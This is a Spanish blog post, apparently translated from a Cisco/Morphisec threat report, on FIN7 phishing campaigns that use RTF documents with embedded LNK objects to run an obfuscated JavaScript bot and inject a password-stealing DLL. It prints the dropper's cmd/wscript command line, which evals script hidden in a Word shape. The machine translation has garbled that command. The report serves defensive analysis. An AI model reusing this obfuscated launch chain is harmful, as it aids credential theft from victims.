Grupo FIN7 utiliza JavaScript y Variante de Stealer DLL en nuevos ataques

A lo largo de este blog vamos a detallar una familia de documentos RTF recién descubierta que está siendo utilizado por el grupo FIN7 (también conocido como la pandilla Carbanak), que es un grupo de motivación financiera dirigida a la industria financiera, hospitalidad y médicos.

Este documento se utiliza en campañas de phishing para ejecutar una serie de lenguajes de scripting que contienen múltiples mecanismos de ofuscación y técnicas avanzadas para eludir los mecanismos de seguridad tradicionales. El documento contiene mensajes que inducen al usuario a hacer clic en un objeto incrustado que ejecuta secuencias de comandos que se utilizan para infectar el sistema con una variante de malware de robo de información.

Este malware se utiliza para robar contraseñas de navegadores populares y clientes de correo que se envían a nodos remotos que son accesibles para los atacantes. Estos mecanismos avanzados y el malware de robo de información serán discutidos en detalle. También revisaremos una serie de mecanismos de detección estáticos y dinámicos utilizados en el AMP para las líneas de productos Endpoints y Threat Grid para detectar estas familias de documentos.

El 9 de junio de 2017 Morphisec Lab publicó una entrada en el blog que detalla una nueva técnica de vector de infección utilizando un documento RTF que contiene un objeto incrustado JavaScript OLE. Al hacer clic en él, se inicia una cadena de infección formada por JavaScript y una carga final de shellcode que hace uso de DNS para cargar shellcode adicional desde un servidor remoto de comando y control.

En esta publicación de colaboración con Morphisec Lab y el equipo de investigación y eficacia de Cisco, ahora publicamos los detalles de esta nueva variante de documento que utiliza un objeto OLE incorporado a LNK, que extrae un bot JavaScript de un objeto de documento e inyecta una DLL de stealer en memoria con PowerShell. Los detalles que estamos liberando son para proporcionar una visión de las metodologías de ataque que están siendo empleados por grupos sofisticados como FIN7 que están constantemente cambiando las técnicas entre los ataques para evitar la detección y para demostrar las capacidades de detección del AMP para Endpoints y Threat Grid. Esto es relevante para las constantes amenazas que están afectando a múltiples tipos de industrias sobre una base diaria.

VECTOR DE INFECCIONES

La variante de cuentagotas que hemos encontrado hace uso de un archivo LNK para ejecutar wscript.exe con el principio de la cadena de JavaScript desde un objeto de documento de palabra:

C: \ Windows \ System32 \ cmd.exe .. \ Windows \ System32 \ cmd.exe / C set x = wsc @ ript / e: js @ cript% HOMEPATH% \ md5.txt & echo intentar {w = GetObject (“”, “Wor” + “d.Application”), esto [String.fromCharCode (101) + ‘va’ + ‘l’] (w.ActiveDocument.Shapes (1) .TextFrame.TextRange. Texto);} catch (e) {}; >% HOMEPATH% \ md5.txt & echo% x: @ =% | cmd

Esta cadena implica una cantidad sustancial de archivos codificados en base64 codificados en JavaScript que componen cada componente del bot JavaScript. También contiene el código reflexivo de PowerShell de inyección de DLL para inyectar una DLL de variante de malware que roba información que se discutirá más adelante.

Ver mas información al respecto en ingles original en Fuente: